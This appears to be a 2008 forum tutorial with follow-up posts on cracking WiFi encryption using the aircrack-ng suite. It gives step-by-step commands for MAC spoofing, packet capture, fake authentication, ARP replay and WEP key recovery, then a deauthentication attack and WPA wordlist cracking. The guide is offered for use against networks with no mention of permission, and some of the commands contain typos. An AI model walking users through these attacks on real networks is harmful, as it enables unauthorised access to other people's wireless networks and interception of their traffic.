WiFi Hacking 101
O.K folks, in this tut i am going to show you how to crack wep, Sniff non ssl & some ssl passwords over a wireless network & sniffing msn chats
Part. 1, Cracking WEP
my way of cracking wep is a little different than other ways but it gets the job done quicker than everyone else's way
so you will need backtrack 3 and a supported wifi card that can go into monitor mode (i have a ranlink 2500 card (ra0) )
open up a shell
ok so 1st we need to stop our wireless card so we do the airmon command
airmon-ng stop [wifi card extension e.g ath0]
now lets change our mac address
macchanger --mac 00:11:22:33:44:55 [wifi card extension]
now lets fire our card up in monitor mode
airmon-ng start [wifi card extension]
now we need the mac address of the AP we are hacking so lets do
airodump-ng [wifi card extension] now you will see your AP. Take note of the mac address/ BSSID and the channel, now hit CTRL+C to stop airodump jumping channels or you will come into problems later on.
now lets start capturing the data packets we need for the hack so type
airodump-ng -c [channel] -b [bssid/ mac addres of AP] -w [filename] [wifi card extension] so for example
airodump-ng -c 1 -b 01:1b:11:78:d9:f2 -w linksys ra0
once you have done that command you should see some info come up clients, mac address, channel, data ect now you should see the data filling up we need the data to get to about 10-15 thousand to crack the key so we need to speed it up we get a lot of data in a short space of time.
we are now going to use aireplay so open up another shell and type aireplay-ng -1 -0 -a [AP mac address/ bssid] -h [faked mac address] [wifi card extension] for example
aireplay-ng -1 0 -a 02:1b:11:78:d9:f2 -h 00:11:22:33:44:55 ra0
now once you see authentication successful proceed to replay a data packet to the access point which will force it to send out lots of packets we can use to crack the key so do,
aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b [ap mac address/ bssid] -h [faked mac address] [wifi card extension] for example
aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b 02:1b:11:78:d9:f2 -h 00:11:22:33:44:55 ra0
now aireplay will start reading the packets and once it finds one you can use for the hack it will prompt you to use that packet? just hit y then enter now on the airodump shell you will see the data filling up very fast ance it gets to 10,000 run this command:
aircrack-ng -b [mac address/ bssid] [file name you used earlier +-01.cap] for example
aircrack-ng -b 02:1b:11:78:d9:f2 linksys-01.cap
and aircrack will start decrypting the packets/ IV's and find the wep key!
if this is your first time doing wep cracking it should take about 10-20 mins at first and you will start progressing to 8 mins, 5 mins, 3 mins ect
other tuts to follow! [[its 03:45am in the uk :O]]
thanks for reading!!
will also get some screen shots up tomorrow.
Last edited by pureh@te; 11-16-2008 at 03:17 AM.
ifconfig rausb0 up
airodump-ng -w capture -c 6 rausb0
aireplay-ng -O 10 -a <mac access point> -c <mac client> rausb0
-O ->deauthenticate attack
aireplay-nh -3 -b <mac access point> -h <mac client> rausb0
-3 ->arp request
aircrack-ng -a 2 filename.cap -w wordlist.lst -b AP:MA:CG:OE:SH:ERE
Note.You must capture full cap files with airodump-ng (which means without --ivs option), not just IVs
Have you tried to manually connect to your AP?
iwconfig eth0 essid <whatever your ssid is>
iwconfig eth0 channel <whatever channel your AP is on>
iwconfig eth0 key <whatever the key is> (if you have WEP turned on)
ifconfig eth0 up
Try that, give it a minute or 2 and then run iwconfig again and post your results.